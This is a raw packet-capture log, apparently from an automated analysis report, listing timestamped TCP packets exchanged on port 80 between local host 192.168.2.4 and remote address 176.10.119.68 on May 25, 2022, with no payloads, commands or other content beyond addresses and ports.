May 25, 2022 11:27:26.450634003 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.450649023 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.450651884 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:26.450670958 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.450683117 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:26.450711012 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.450725079 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:26.450733900 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.450756073 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.450768948 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:26.450771093 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.450788975 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:26.450812101 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.450814009 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:26.450834036 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.450856924 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.450866938 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:26.450877905 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.450879097 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:26.450894117 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.450896025 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:26.450933933 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:26.451045990 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.451093912 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:26.451112986 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.451138020 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.451154947 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.451169968 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.451201916 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:26.451236963 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:26.451260090 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.451311111 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:26.451324940 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.451365948 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.451385975 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.451391935 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:26.451400995 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.451426029 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:26.451447010 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:26.451569080 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.451637983 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:26.468266964 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.468291998 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.468305111 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.468399048 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:26.468487978 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.468506098 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.468523026 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.468535900 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.468544006 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.468559980 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.468559980 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:26.468571901 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.468589067 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.468594074 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:26.468605995 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.468617916 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.468628883 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:26.468667030 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:26.469391108 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.469410896 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.469428062 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.469443083 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.469455004 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.469470978 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.469484091 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:26.469485998 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.469502926 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.469520092 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.469535112 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.469538927 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:26.469553947 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.469558954 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:26.469571114 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.469582081 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:26.469583988 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.469602108 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.469605923 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:26.469619036 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.469635963 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.469651937 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.469659090 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:26.469665051 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:26.469669104 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.469686985 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.469692945 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:26.469703913 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.469712973 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:26.469717026 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.469748974 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:26.469923973 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.469943047 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.469959021 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.469974995 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.469990969 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.470007896 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.470024109 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.470036030 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.470082045 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.470102072 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:26.470112085 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.470129013 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.470156908 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:26.470159054 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.470165014 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:26.470199108 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.470207930 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:26.470216990 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.470235109 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.470251083 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.470263004 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.470278025 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.470287085 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:26.470294952 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.470295906 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:26.470314980 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.470323086 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:26.470331907 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.470340014 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:26.470344067 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.470360994 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.470371008 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:26.470376015 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.470393896 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.470402956 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:26.470407009 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.470421076 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:26.470478058 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.470483065 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:26.470520973 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.470540047 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.470546007 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:26.470556974 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.470573902 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.470588923 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:26.470590115 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.470606089 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.470623016 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:26.470623970 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.470635891 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.470643997 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:26.470675945 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.470674992 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:26.470720053 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.470737934 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.470746040 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:26.470748901 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.470804930 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:26.470853090 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.470870972 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.470887899 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.470905066 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.470921040 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.470937967 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.470952988 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.470969915 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.470980883 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.470997095 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:26.471020937 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:26.471066952 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.471215963 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.011665106 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.030174017 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.299287081 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.299329042 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.299351931 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.299371004 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.299531937 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.299571991 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.299608946 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.299635887 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.299660921 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.299679041 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.299736023 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.299742937 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.299978971 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.300035954 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.300059080 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.300074100 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.300132990 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.300144911 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.313472986 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.313582897 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.313654900 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.313709974 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.313772917 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.313817024 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.313823938 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.314618111 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.316514015 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.317565918 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.317642927 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.317699909 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.317774057 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.317840099 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.317894936 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.317904949 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.317912102 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.318012953 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.318082094 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.318135023 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.318200111 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.318206072 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.318223000 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.318298101 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.318356037 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.318419933 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.318483114 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.318486929 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.318492889 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.318542004 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.318634033 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.318697929 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.318756104 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.318762064 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.318799973 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.318815947 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.318888903 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.318898916 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.318938971 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.318978071 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.319004059 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.319036961 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.319045067 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.319080114 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.319112062 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.319120884 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.319128990 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.327774048 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.327832937 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.327896118 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.327934980 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.327992916 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.327999115 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.328049898 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.328063011 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.328105927 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.328119040 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.328129053 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.328141928 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.328536034 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.331705093 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.331840992 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.331969023 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.331995010 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.332029104 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.332056046 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.332082987 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.332109928 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.332129002 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.332129955 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.332139969 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.332144976 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.332158089 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.334320068 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.334352970 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.334379911 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.334400892 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.334422112 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.334444046 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.335597038 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.335628033 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.335655928 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.335674047 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.335725069 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.335747957 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.337210894 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.337244987 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.337271929 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.337301016 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.337321997 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.337347984 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.337374926 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.337393999 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.337400913 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.337405920 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.337424994 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.337430954 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.337431908 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.337450981 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.337559938 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.337625980 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.337657928 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.337683916 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.337712049 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.337724924 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.337732077 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.337759018 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
